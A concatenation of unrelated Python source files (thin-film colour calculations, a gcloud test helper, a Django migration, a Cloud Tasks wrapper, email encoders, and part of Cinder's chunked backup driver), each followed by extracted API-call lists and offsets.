'narrow' range make only a tiny difference to the color, because they are
almost invisible to the eye. If spectral_range is 'narrow', then the n(400)
values are used for 360-400 and n(700) for 700-830nm
Returns a 2-column array where the first column is wavelength in nm
(360,361,362,...,830) and the second column is reflectivity (from 0
to 1, where 1 is a perfect mirror). This range is chosen to be
consistent with colorpy.illuminants. See colorpy.ciexyz.start_wl_nm etc.
"""
lam_vac_list = arange(360, 831)
num_layers = len(n_fn_list)
def extend_spectral_range(n_fn):
"""
Starting with a narrow-spectrum refractive index function
n_fn(wavelength), create then return the corresponding full-spectrum
refractive index function
"""
def extended_n_fn(lam):
if lam < 400:
return n_fn(400)
elif lam > 700:
return n_fn(700)
else:
return n_fn(lam)
return extended_n_fn
if spectral_range == 'narrow':
n_fn_list = [extend_spectral_range(n_fn) for n_fn in n_fn_list]
final_answer = []
for lam_vac in lam_vac_list:
n_list = [n_fn_list[i](lam_vac) for i in range(num_layers)]
R = coh_tmm(pol, n_list, d_list, th_0, lam_vac)['R']
final_answer.append([lam_vac,R])
final_answer = array(final_answer)
return final_answer
def calc_spectrum(reflectances, illuminant):
"""
* reflectances is the output of calc_reflec_spec()
* illuminant is a 2D numpy arrays, with one row for each wavelength,
with the first column holding the wavelength in nm, and the
second column the intensity. This is the form returned by the
functions in colorpy.illuminants. It is normally assumed that
illuminant is normalized so that Y=1.
"""
#Both colorpy.illuminants and calc_reflec_spec should go from
#colorpy.ciexyz.start_wl_nm etc, so they should have matching
#wavelength specifications
if not np.all(reflectances[:,0] == illuminant[:,0]):
raise ValueError('Wavelength range is inconsistent...Both should be 360,361,...,830.\n'
+ 'reflectances[0]=' + str(reflectances[0]) + ', reflectances[-1]=' + str(reflectances[-1])
+ '\nilluminant[0]=' + str(illuminant[0]) + ', illuminant[-1]=' + str(reflectances[-1]))
final_answer = []
for i,lam in enumerate(reflectances[:,0]):
final_answer.append([lam, reflectances[i,1] * illuminant[i,1]])
return array(final_answer)
def calc_color(spectrum, scale=None, show_warnings=True):
"""
Calculate the color in various representations.
spectrum is the output of calc_spectrum.
scale is the scaling method. Possibilities are:
* scale=None means don't scale. This is usually what you want, bucause
the illuminant should be pre-scaled in an appropriate way.
(Specifically, it's scaled to get Y=1 for a perfect reflector.)
* scale='Y1' means that the intensity is increased or decreased in
order to set Y (the luminance) to 1. So you can get white but not gray,
you can get orange but not brown, etc.
* scale=0.789 multiplies X,Y,Z by 0.789. Any number > 0 is OK.
Returns a dictionary with rgb, irgb, xy, xyY, and XYZ. Definitions:
* xy, xyY and XYZ are defined as in
http://en.wikipedia.org/wiki/CIE_1931_color_space
* rgb is the linear (i.e., proportional to intensity, not
gamma-corrected) version of sRGB.
* irgb is ready-to-display sRGB, i.e. it is clipped to the range 0-1,
and gamma-corrected, and rounded to three integers in the range 0-255.
(sRGB is the standard RGB used in modern displays and printers.)
"""
assert (scale is None or scale == 'Y1'
or (type(scale) is float and scale > 0))
XYZ = colorpy.ciexyz.xyz_from_spectrum(spectrum)
assert min(XYZ) >= 0
if scale == 'Y1' or type(scale) is float:
factor = (1.0 / XYZ[1] if scale == 'Y1' else scale)
XYZ[0] *= factor
XYZ[1] *= factor
XYZ[2] *= factor
X,Y,Z = XYZ
if show_warnings:
if Y > 1:
print('Warning: Oversaturated color! XYZ = ', XYZ)
xy = [X / (X + Y + Z), Y / (X + Y + Z)]
xyY = [xy[0], xy[1], Y]
rgb = colorpy.colormodels.rgb_from_xyz(XYZ)
irgb = colorpy.colormodels.irgb_from_rgb(rgb)
return {'xy':xy, 'xyY':xyY, 'XYZ':XYZ, 'rgb':rgb, 'irgb':irgb}
def plot_reflectances(reflectances, filename='temp_plot.png', title='Reflectance', ylabel='Fraction reflected'):
"""
Makes nice colored plot of reflectances. reflectances is the output of
calc_reflectances(...)
"""
colorpy.plots.spectrum_plot(reflectances, title, filename, ylabel=ylabel)
def plot_spectrum(spectrum, filename='temp_plot.png', title='Reflected light under illumination', ylabel='Intensity (a.u.)'):
"""
Makes nice colored plot of the reflected color spectrum you see under a
certain illuminant. spectrum is the output of
calc_spectrum(...)
"""
colorpy.plots.spectrum_plot(spectrum, title, filename, ylabel=ylabel)
|
[
"colorpy.ciexyz.xyz_from_spectrum",
"numpy.all",
"colorpy.plots.spectrum_plot",
"numpy.array",
"numpy.arange",
"colorpy.colormodels.irgb_from_rgb",
"colorpy.colormodels.rgb_from_xyz"
] |
[((2541, 2557), 'numpy.arange', 'arange', (['(360)', '(831)'], {}), '(360, 831)\n', (2547, 2557), False, 'from numpy import arange, array\n'), ((3416, 3435), 'numpy.array', 'array', (['final_answer'], {}), '(final_answer)\n', (3421, 3435), False, 'from numpy import arange, array\n'), ((4564, 4583), 'numpy.array', 'array', (['final_answer'], {}), '(final_answer)\n', (4569, 4583), False, 'from numpy import arange, array\n'), ((5883, 5925), 'colorpy.ciexyz.xyz_from_spectrum', 'colorpy.ciexyz.xyz_from_spectrum', (['spectrum'], {}), '(spectrum)\n', (5915, 5925), False, 'import colorpy\n'), ((6333, 6370), 'colorpy.colormodels.rgb_from_xyz', 'colorpy.colormodels.rgb_from_xyz', (['XYZ'], {}), '(XYZ)\n', (6365, 6370), False, 'import colorpy\n'), ((6382, 6420), 'colorpy.colormodels.irgb_from_rgb', 'colorpy.colormodels.irgb_from_rgb', (['rgb'], {}), '(rgb)\n', (6415, 6420), False, 'import colorpy\n'), ((6724, 6797), 'colorpy.plots.spectrum_plot', 'colorpy.plots.spectrum_plot', (['reflectances', 'title', 'filename'], {'ylabel': 'ylabel'}), '(reflectances, title, filename, ylabel=ylabel)\n', (6751, 6797), False, 'import colorpy\n'), ((7094, 7163), 'colorpy.plots.spectrum_plot', 'colorpy.plots.spectrum_plot', (['spectrum', 'title', 'filename'], {'ylabel': 'ylabel'}), '(spectrum, title, filename, ylabel=ylabel)\n', (7121, 7163), False, 'import colorpy\n'), ((4072, 4118), 'numpy.all', 'np.all', (['(reflectances[:, 0] == illuminant[:, 0])'], {}), '(reflectances[:, 0] == illuminant[:, 0])\n', (4078, 4118), True, 'import numpy as np\n')]
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import downloads
import json
import os
import e2e
def download_gcloud(version):
now = datetime.datetime.utcnow()
now = now.replace(microsecond=0)
scratch_dir = os.path.join(
e2e.workspace_dir(), "gcloud-scratch-" + now.strftime("%Y%m%d%H%M%s")
)
# We build up symlinks to the downloaded binaries in the bin directory
bin_dir = os.path.join(scratch_dir, "bin")
os.makedirs(bin_dir, exist_ok=True)
url = (
"https://dl.google.com/dl/cloudsdk/channels/rapid/downloads/google-cloud-sdk-"
+ version
+ "-linux-x86_64.tar.gz"
)
tarfile = os.path.join(scratch_dir, "gcloud.tar.gz")
downloads.download_url(url, tarfile) # TODO: hashing?
expanded = downloads.expand_tar(tarfile)
gcloud_path = os.path.join(bin_dir, "gcloud")
os.symlink(os.path.join(expanded, "google-cloud-sdk", "bin", "gcloud"), gcloud_path)
gsutil_path = os.path.join(bin_dir, "gsutil")
os.symlink(os.path.join(expanded, "google-cloud-sdk", "bin", "gsutil"), gsutil_path)
return Gcloud(gcloud_path, gsutil=gsutil_path)
def local_gcloud():
return Gcloud("gcloud", gsutil="gsutil")
class Gcloud(object):
def __init__(self, bin, statedir=None, env=None, gsutil=None):
if env is None:
env = os.environ.copy()
self.bin = os.path.expanduser(bin)
self.env = env
self.statedir = statedir
self.gsutil = gsutil
def __repr__(self):
s = "Gcloud:" + self.bin
return s
# add_to_path ensures that kubectl is on the provider environ
def add_to_path(self, env):
d = os.path.dirname(self.bin)
env["PATH"] = d + ":" + env["PATH"]
def download_from_gcs(self, url, dest):
mirror = os.environ.get("GCS_TRUSTED_MIRROR")
if mirror:
print("using GCS_TRUSTED_MIRROR %s" % (mirror))
if not mirror.endswith("/"):
mirror += "/"
url = mirror + url.replace("gs://", "gs/")
args = ["cp", url, dest]
return downloads.exec([self.gsutil] + args, env=self.env).strip()
def current_project(self):
return self.exec(["config", "get-value", "project"])
def set_current_project(self, project):
return self.exec(["config", "set", "project", project])
def describe_project(self, project):
args = ["projects", "describe", project]
return self.exec_and_parse_json(args)
def describe_gke_cluster(self, location, name):
args = ["container", "clusters", "describe", "--zone", location, name]
return self.exec_and_parse_json(args)
def delete_gke_cluster(self, location, name):
args = ["container", "clusters", "delete", "--quiet", "--zone", location, name]
return self.exec(args)
def list_gke_clusters(self):
args = ["container", "clusters", "list"]
return self.exec_and_parse_json(args)
def get_gke_cluster_creds(self, name, location, project):
args = ["container", "clusters", "get-credentials", name, "--zone", location, "--project", project]
return self.exec(args)
def exec(self, args):
return downloads.exec(
[self.bin] + args, cwd=self.statedir, env=self.env
).strip()
def exec_and_parse_json(self, args):
j = downloads.exec(
[self.bin, "--format", "json"] + args, cwd=self.statedir, env=self.env
).strip()
return json.loads(j)
def decrypt_key(self, args):
return self.exec(args)
|
[
"os.path.expanduser",
"os.makedirs",
"json.loads",
"os.path.dirname",
"os.environ.copy",
"e2e.workspace_dir",
"downloads.download_url",
"os.environ.get",
"datetime.datetime.utcnow",
"downloads.expand_tar",
"downloads.exec",
"os.path.join"
] |
[((684, 710), 'datetime.datetime.utcnow', 'datetime.datetime.utcnow', ([], {}), '()\n', (708, 710), False, 'import datetime\n'), ((955, 987), 'os.path.join', 'os.path.join', (['scratch_dir', '"""bin"""'], {}), "(scratch_dir, 'bin')\n", (967, 987), False, 'import os\n'), ((992, 1027), 'os.makedirs', 'os.makedirs', (['bin_dir'], {'exist_ok': '(True)'}), '(bin_dir, exist_ok=True)\n', (1003, 1027), False, 'import os\n'), ((1199, 1241), 'os.path.join', 'os.path.join', (['scratch_dir', '"""gcloud.tar.gz"""'], {}), "(scratch_dir, 'gcloud.tar.gz')\n", (1211, 1241), False, 'import os\n'), ((1246, 1282), 'downloads.download_url', 'downloads.download_url', (['url', 'tarfile'], {}), '(url, tarfile)\n', (1268, 1282), False, 'import downloads\n'), ((1316, 1345), 'downloads.expand_tar', 'downloads.expand_tar', (['tarfile'], {}), '(tarfile)\n', (1336, 1345), False, 'import downloads\n'), ((1365, 1396), 'os.path.join', 'os.path.join', (['bin_dir', '"""gcloud"""'], {}), "(bin_dir, 'gcloud')\n", (1377, 1396), False, 'import os\n'), ((1505, 1536), 'os.path.join', 'os.path.join', (['bin_dir', '"""gsutil"""'], {}), "(bin_dir, 'gsutil')\n", (1517, 1536), False, 'import os\n'), ((789, 808), 'e2e.workspace_dir', 'e2e.workspace_dir', ([], {}), '()\n', (806, 808), False, 'import e2e\n'), ((1412, 1471), 'os.path.join', 'os.path.join', (['expanded', '"""google-cloud-sdk"""', '"""bin"""', '"""gcloud"""'], {}), "(expanded, 'google-cloud-sdk', 'bin', 'gcloud')\n", (1424, 1471), False, 'import os\n'), ((1552, 1611), 'os.path.join', 'os.path.join', (['expanded', '"""google-cloud-sdk"""', '"""bin"""', '"""gsutil"""'], {}), "(expanded, 'google-cloud-sdk', 'bin', 'gsutil')\n", (1564, 1611), False, 'import os\n'), ((1915, 1938), 'os.path.expanduser', 'os.path.expanduser', (['bin'], {}), '(bin)\n', (1933, 1938), False, 'import os\n'), ((2210, 2235), 'os.path.dirname', 'os.path.dirname', (['self.bin'], {}), '(self.bin)\n', (2225, 2235), False, 'import os\n'), ((2342, 2378), 'os.environ.get', 'os.environ.get', (['"""GCS_TRUSTED_MIRROR"""'], {}), "('GCS_TRUSTED_MIRROR')\n", (2356, 2378), False, 'import os\n'), ((4035, 4048), 'json.loads', 'json.loads', (['j'], {}), '(j)\n', (4045, 4048), False, 'import json\n'), ((1878, 1895), 'os.environ.copy', 'os.environ.copy', ([], {}), '()\n', (1893, 1895), False, 'import os\n'), ((2633, 2683), 'downloads.exec', 'downloads.exec', (['([self.gsutil] + args)'], {'env': 'self.env'}), '([self.gsutil] + args, env=self.env)\n', (2647, 2683), False, 'import downloads\n'), ((3752, 3818), 'downloads.exec', 'downloads.exec', (['([self.bin] + args)'], {'cwd': 'self.statedir', 'env': 'self.env'}), '([self.bin] + args, cwd=self.statedir, env=self.env)\n', (3766, 3818), False, 'import downloads\n'), ((3903, 3993), 'downloads.exec', 'downloads.exec', (["([self.bin, '--format', 'json'] + args)"], {'cwd': 'self.statedir', 'env': 'self.env'}), "([self.bin, '--format', 'json'] + args, cwd=self.statedir,\n env=self.env)\n", (3917, 3993), False, 'import downloads\n')]
|
# Generated by Django 3.1.1 on 2020-09-17 18:40
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Fixture',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('owner', models.CharField(max_length=100)),
('date_added', models.DateTimeField(default=django.utils.timezone.now)),
('last_rented', models.DateTimeField(default=None)),
('last_sickbay', models.DateTimeField(default=None)),
('last_service', models.TextField()),
('model', models.CharField(max_length=100)),
('manufacturer', models.CharField(max_length=100)),
],
),
migrations.CreateModel(
name='Hardware',
fields=[
('fixture_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='inventory.fixture')),
],
bases=('inventory.fixture',),
),
migrations.CreateModel(
name='Projector',
fields=[
('fixture_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='inventory.fixture')),
],
bases=('inventory.fixture',),
),
]
|
[
"django.db.models.TextField",
"django.db.models.OneToOneField",
"django.db.models.CharField",
"django.db.models.AutoField",
"django.db.models.DateTimeField"
] |
[((365, 458), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (381, 458), False, 'from django.db import migrations, models\n'), ((483, 515), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (499, 515), False, 'from django.db import migrations, models\n'), ((549, 604), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'default': 'django.utils.timezone.now'}), '(default=django.utils.timezone.now)\n', (569, 604), False, 'from django.db import migrations, models\n'), ((639, 673), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'default': 'None'}), '(default=None)\n', (659, 673), False, 'from django.db import migrations, models\n'), ((709, 743), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'default': 'None'}), '(default=None)\n', (729, 743), False, 'from django.db import migrations, models\n'), ((779, 797), 'django.db.models.TextField', 'models.TextField', ([], {}), '()\n', (795, 797), False, 'from django.db import migrations, models\n'), ((826, 858), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (842, 858), False, 'from django.db import migrations, models\n'), ((894, 926), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (910, 926), False, 'from django.db import migrations, models\n'), ((1069, 1240), 'django.db.models.OneToOneField', 'models.OneToOneField', ([], {'auto_created': '(True)', 'on_delete': 'django.db.models.deletion.CASCADE', 'parent_link': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'to': '"""inventory.fixture"""'}), "(auto_created=True, on_delete=django.db.models.deletion\n .CASCADE, parent_link=True, primary_key=True, serialize=False, to=\n 'inventory.fixture')\n", (1089, 1240), False, 'from django.db import migrations, models\n'), ((1416, 1587), 'django.db.models.OneToOneField', 'models.OneToOneField', ([], {'auto_created': '(True)', 'on_delete': 'django.db.models.deletion.CASCADE', 'parent_link': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'to': '"""inventory.fixture"""'}), "(auto_created=True, on_delete=django.db.models.deletion\n .CASCADE, parent_link=True, primary_key=True, serialize=False, to=\n 'inventory.fixture')\n", (1436, 1587), False, 'from django.db import migrations, models\n')]
|
import enum
import json
import time
import typing as t
import structlog
from django.conf import settings
from django.core.serializers.json import DjangoJSONEncoder
from django.urls import reverse
from google.cloud.tasks_v2 import CloudTasksClient
log = structlog.get_logger()
registry = {}
schedule_registry = {}
class RetryTaskException(Exception):
pass
class TaskResponse(enum.IntEnum):
SUCCESS = 200
RETRY = 429
FAIL = 500
class Task:
client = None
def __init__(self, f, queue: str, should_retry=True):
self.f = f
self.queue = queue
self.should_retry = should_retry
@classmethod
def get_client(cls):
if cls.client is None:
cls.client = CloudTasksClient()
return cls.client
@property
def name(self):
return f"{self.f.__module__}.{self.f.__name__}"
def __str__(self):
return f"<Task {self.name}>"
def __call__(self, *args, **kwargs):
return self.f(*args, **kwargs)
def enqueue(self, *args, **kwargs):
client = self.get_client()
parent = client.queue_path(settings.PROJECT_ID, settings.PROJECT_REGION, self.queue)
body = {
"http_request": {
"http_method": "POST",
"url": f"https://{settings.TASK_DOMAIN}{reverse('task-execute')}",
"oidc_token": {"service_account_email": settings.TASK_SERVICE_ACCOUNT},
"body": json.dumps(
{"function": self.name, "args": args, "kwargs": kwargs}, cls=DjangoJSONEncoder
).encode("utf-8"),
},
}
response = self.get_client().create_task(parent, body)
log.info("tasks.queued", name=self.name, task_id=response.name)
return response
class DebugTask(Task):
def enqueue(self, *args, **kwargs):
# execute all tasks inline
body = json.dumps(
{"function": self.name, "args": args, "kwargs": kwargs}, cls=DjangoJSONEncoder
).encode("utf-8")
body = json.loads(body.decode("utf-8"))
execute_task(body["function"], body["args"], body["kwargs"])
def get_task_class() -> t.Type[Task]:
if settings.DEBUG:
return DebugTask
return Task
def register_task(
should_retry=True, queue=settings.TASK_DEFAULT_QUEUE, schedule=None
) -> t.Union[Task, t.Callable[[t.Callable], Task]]:
def do_register(f, _should_retry, _queue) -> Task:
task = get_task_class()(f, _queue, should_retry=_should_retry)
registry[task.name] = task
if schedule is not None:
schedule_registry[task.name] = schedule
return task
def as_decorator(f) -> Task:
return do_register(f, should_retry, queue)
if callable(should_retry):
# called with @register_task
return do_register(should_retry, True, queue)
return as_decorator
def execute_task(name, args, kwargs) -> TaskResponse:
task = registry.get(name)
if task is None:
log.error("tasks.unknown", name=name)
return TaskResponse.SUCCESS
start = time.time()
log.info("tasks.start", name=name)
try:
task(*args, **kwargs)
log.info("tasks.finish", name=name, time=f"{int((time.time() - start) * 1000)}ms")
return TaskResponse.SUCCESS
except RetryTaskException:
log.info("task.force_retry", name=name)
return TaskResponse.RETRY
except Exception:
log.exception("task.crash", name=name, should_retry=task.should_retry)
if task.should_retry:
return TaskResponse.FAIL
return TaskResponse.SUCCESS
|
[
"json.dumps",
"time.time",
"django.urls.reverse",
"google.cloud.tasks_v2.CloudTasksClient",
"structlog.get_logger"
] |
[((255, 277), 'structlog.get_logger', 'structlog.get_logger', ([], {}), '()\n', (275, 277), False, 'import structlog\n'), ((3092, 3103), 'time.time', 'time.time', ([], {}), '()\n', (3101, 3103), False, 'import time\n'), ((725, 743), 'google.cloud.tasks_v2.CloudTasksClient', 'CloudTasksClient', ([], {}), '()\n', (741, 743), False, 'from google.cloud.tasks_v2 import CloudTasksClient\n'), ((1898, 1993), 'json.dumps', 'json.dumps', (["{'function': self.name, 'args': args, 'kwargs': kwargs}"], {'cls': 'DjangoJSONEncoder'}), "({'function': self.name, 'args': args, 'kwargs': kwargs}, cls=\n DjangoJSONEncoder)\n", (1908, 1993), False, 'import json\n'), ((1314, 1337), 'django.urls.reverse', 'reverse', (['"""task-execute"""'], {}), "('task-execute')\n", (1321, 1337), False, 'from django.urls import reverse\n'), ((1453, 1548), 'json.dumps', 'json.dumps', (["{'function': self.name, 'args': args, 'kwargs': kwargs}"], {'cls': 'DjangoJSONEncoder'}), "({'function': self.name, 'args': args, 'kwargs': kwargs}, cls=\n DjangoJSONEncoder)\n", (1463, 1548), False, 'import json\n'), ((3239, 3250), 'time.time', 'time.time', ([], {}), '()\n', (3248, 3250), False, 'import time\n')]
|
# Copyright (C) 2001 Python Software Foundation
# Author: <EMAIL> (<NAME>)
"""Module containing encoding functions for Image.Image and Text.Text.
"""
import base64
from quopri import encodestring as _encodestring
# Helpers
def _qencode(s):
return _encodestring(s, quotetabs=1)
def _bencode(s):
# We can't quite use base64.encodestring() since it tacks on a "courtesy
# newline". Blech!
if not s:
return s
hasnewline = (s[-1] == '\n')
value = base64.encodestring(s)
if not hasnewline and value[-1] == '\n':
return value[:-1]
return value
def encode_base64(msg):
"""Encode the message's payload in Base64.
Also, add an appropriate Content-Transfer-Encoding: header.
"""
orig = msg.get_payload()
encdata = _bencode(orig)
msg.set_payload(encdata)
msg['Content-Transfer-Encoding'] = 'base64'
def encode_quopri(msg):
"""Encode the message's payload in Quoted-Printable.
Also, add an appropriate Content-Transfer-Encoding: header.
"""
orig = msg.get_payload()
encdata = _qencode(orig)
msg.set_payload(encdata)
msg['Content-Transfer-Encoding'] = 'quoted-printable'
def encode_7or8bit(msg):
"""Set the Content-Transfer-Encoding: header to 7bit or 8bit."""
orig = msg.get_payload()
# We play a trick to make this go fast. If encoding to ASCII succeeds, we
# know the data must be 7bit, otherwise treat it as 8bit.
try:
orig.encode('ascii')
except UnicodeError:
msg['Content-Transfer-Encoding'] = '8bit'
else:
msg['Content-Transfer-Encoding'] = '7bit'
def encode_noop(msg):
"""Do nothing."""
|
[
"base64.encodestring",
"quopri.encodestring"
] |
[((257, 286), 'quopri.encodestring', '_encodestring', (['s'], {'quotetabs': '(1)'}), '(s, quotetabs=1)\n', (270, 286), True, 'from quopri import encodestring as _encodestring\n'), ((483, 505), 'base64.encodestring', 'base64.encodestring', (['s'], {}), '(s)\n', (502, 505), False, 'import base64\n')]
|
# Copyright (C) 2012 Hewlett-Packard Development Company, L.P.
# Copyright (c) 2014 TrilioData, Inc
# Copyright (c) 2015 EMC Corporation
# Copyright (C) 2015 <NAME> <<EMAIL>>
# Copyright (C) 2015 <NAME> <<EMAIL>>
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Generic base class to implement metadata, compression and chunked data
operations
"""
import abc
import hashlib
import json
import os
import eventlet
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import excutils
from oslo_utils import units
import six
from cinder.backup import driver
from cinder import exception
from cinder.i18n import _, _LE, _LI, _LW
from cinder.openstack.common import loopingcall
from cinder.volume import utils as volume_utils
LOG = logging.getLogger(__name__)
chunkedbackup_service_opts = [
cfg.StrOpt('backup_compression_algorithm',
default='zlib',
help='Compression algorithm (None to disable)'),
]
CONF = cfg.CONF
CONF.register_opts(chunkedbackup_service_opts)
@six.add_metaclass(abc.ABCMeta)
class ChunkedBackupDriver(driver.BackupDriver):
"""Abstract chunked backup driver.
Implements common functionality for backup drivers that store volume
data in multiple "chunks" in a backup repository when the size of
the backed up cinder volume exceeds the size of a backup repository
"chunk."
Provides abstract methods to be implmented in concrete chunking drivers.
"""
DRIVER_VERSION = '1.0.0'
DRIVER_VERSION_MAPPING = {'1.0.0': '_restore_v1'}
def _get_compressor(self, algorithm):
try:
if algorithm.lower() in ('none', 'off', 'no'):
return None
elif algorithm.lower() in ('zlib', 'gzip'):
import zlib as compressor
return compressor
elif algorithm.lower() in ('bz2', 'bzip2'):
import bz2 as compressor
return compressor
except ImportError:
pass
err = _('unsupported compression algorithm: %s') % algorithm
raise ValueError(err)
def __init__(self, context, chunk_size_bytes, sha_block_size_bytes,
backup_default_container, enable_progress_timer,
db_driver=None):
super(ChunkedBackupDriver, self).__init__(context, db_driver)
self.chunk_size_bytes = chunk_size_bytes
self.sha_block_size_bytes = sha_block_size_bytes
self.backup_default_container = backup_default_container
self.enable_progress_timer = enable_progress_timer
self.backup_timer_interval = CONF.backup_timer_interval
self.data_block_num = CONF.backup_object_number_per_notification
self.az = CONF.storage_availability_zone
self.backup_compression_algorithm = CONF.backup_compression_algorithm
self.compressor = \
self._get_compressor(CONF.backup_compression_algorithm)
# To create your own "chunked" backup driver, implement the following
# abstract methods.
@abc.abstractmethod
def put_container(self, container):
"""Create the container if needed. No failure if it pre-exists."""
return
@abc.abstractmethod
def get_container_entries(self, container, prefix):
"""Get container entry names."""
return
@abc.abstractmethod
def get_object_writer(self, container, object_name, extra_metadata=None):
"""Returns a writer object which stores the chunk data in backup repository.
The object returned should be a context handler that can be used
in a "with" context.
"""
return
@abc.abstractmethod
def get_object_reader(self, container, object_name, extra_metadata=None):
"""Returns a reader object for the backed up chunk."""
return
@abc.abstractmethod
def delete_object(self, container, object_name):
"""Delete object from container."""
return
@abc.abstractmethod
def _generate_object_name_prefix(self, backup):
return
@abc.abstractmethod
def update_container_name(self, backup, container):
"""This method exists so that sub-classes can override the container name
as it comes in to the driver in the backup object. Implementations
should return None if no change to the container name is desired.
"""
return
@abc.abstractmethod
def get_extra_metadata(self, backup, volume):
"""This method allows for collection of extra metadata in prepare_backup()
which will be passed to get_object_reader() and get_object_writer().
Subclass extensions can use this extra information to optimize
data transfers. Return a json serializable object.
"""
return
def _create_container(self, context, backup):
backup_id = backup['id']
backup['container'] = self.update_container_name(backup,
backup['container'])
container = backup['container']
LOG.debug('_create_container started, container: %(container)s,'
'backup: %(backup_id)s.',
{'container': container, 'backup_id': backup_id})
if container is None:
container = self.backup_default_container
self.db.backup_update(context, backup_id, {'container': container})
self.put_container(container)
return container
def _generate_object_names(self, backup):
prefix = backup['service_metadata']
object_names = self.get_container_entries(backup['container'], prefix)
LOG.debug('generated object list: %s.', object_names)
return object_names
def _metadata_filename(self, backup):
object_name = backup['service_metadata']
filename = '%s_metadata' % object_name
return filename
def _sha256_filename(self, backup):
object_name = backup['service_metadata']
filename = '%s_sha256file' % object_name
return filename
def _write_metadata(self, backup, volume_id, container, object_list,
volume_meta, extra_metadata=None):
filename = self._metadata_filename(backup)
LOG.debug('_write_metadata started, container name: %(container)s,'
' metadata filename: %(filename)s.',
{'container': container, 'filename': filename})
metadata = {}
metadata['version'] = self.DRIVER_VERSION
metadata['backup_id'] = backup['id']
metadata['volume_id'] = volume_id
metadata['backup_name'] = backup['display_name']
metadata['backup_description'] = backup['display_description']
metadata['created_at'] = str(backup['created_at'])
metadata['objects'] = object_list
metadata['parent_id'] = backup['parent_id']
metadata['volume_meta'] = volume_meta
if extra_metadata:
metadata['extra_metadata'] = extra_metadata
metadata_json = json.dumps(metadata, sort_keys=True, indent=2)
with self.get_object_writer(container, filename) as writer:
writer.write(metadata_json)
LOG.debug('_write_metadata finished. Metadata: %s.', metadata_json)
def _write_sha256file(self, backup, volume_id, container, sha256_list):
filename = self._sha256_filename(backup)
LOG.debug('_write_sha256file started, container name: %(container)s,'
' sha256file filename: %(filename)s.',
{'container': container, 'filename': filename})
sha256file = {}
sha256file['version'] = self.DRIVER_VERSION
sha256file['backup_id'] = backup['id']
sha256file['volume_id'] = volume_id
sha256file['backup_name'] = backup['display_name']
sha256file['backup_description'] = backup['display_description']
sha256file['created_at'] = six.text_type(backup['created_at'])
sha256file['chunk_size'] = self.sha_block_size_bytes
sha256file['sha256s'] = sha256_list
sha256file_json = json.dumps(sha256file, sort_keys=True, indent=2)
with self.get_object_writer(container, filename) as writer:
writer.write(sha256file_json)
LOG.debug('_write_sha256file finished.')
def _read_metadata(self, backup):
container = backup['container']
filename = self._metadata_filename(backup)
LOG.debug('_read_metadata started, container name: %(container)s, '
'metadata filename: %(filename)s.',
{'container': container, 'filename': filename})
with self.get_object_reader(container, filename) as reader:
metadata_json = reader.read()
metadata = json.loads(metadata_json)
LOG.debug('_read_metadata finished. Metadata: %s.', metadata_json)
return metadata
def _read_sha256file(self, backup):
container = backup['container']
filename = self._sha256_filename(backup)
LOG.debug('_read_sha256file started, container name: %(container)s, '
'sha256 filename: %(filename)s.',
{'container': container, 'filename': filename})
with self.get_object_reader(container, filename) as reader:
sha256file_json = reader.read()
sha256file = json.loads(sha256file_json)
LOG.debug('_read_sha256file finished (%s).', sha256file)
return sha256file
def _prepare_backup(self, backup):
"""Prepare the backup process and return the backup metadata."""
backup_id = backup['id']
volume_id = backup['volume_id']
volume = self.db.volume_get(self.context, volume_id)
if volume['size'] <= 0:
err = _('volume size %d is invalid.') % volume['size']
raise exception.InvalidVolume(reason=err)
container = self._create_container(self.context, backup)
object_prefix = self._generate_object_name_prefix(backup)
backup['service_metadata'] = object_prefix
self.db.backup_update(self.context, backup_id, {'service_metadata':
object_prefix})
volume_size_bytes = volume['size'] * units.Gi
availability_zone = self.az
LOG.debug('starting backup of volume: %(volume_id)s,'
' volume size: %(volume_size_bytes)d, object names'
' prefix %(object_prefix)s, availability zone:'
' %(availability_zone)s',
{
'volume_id': volume_id,
'volume_size_bytes': volume_size_bytes,
'object_prefix': object_prefix,
'availability_zone': availability_zone,
})
object_meta = {'id': 1, 'list': [], 'prefix': object_prefix,
'volume_meta': None}
object_sha256 = {'id': 1, 'sha256s': [], 'prefix': object_prefix}
extra_metadata = self.get_extra_metadata(backup, volume)
if extra_metadata is not None:
object_meta['extra_metadata'] = extra_metadata
return (object_meta, object_sha256, extra_metadata, container,
volume_size_bytes)
def _backup_chunk(self, backup, container, data, data_offset,
object_meta, extra_metadata):
"""Backup data chunk based on the object metadata and offset."""
object_prefix = object_meta['prefix']
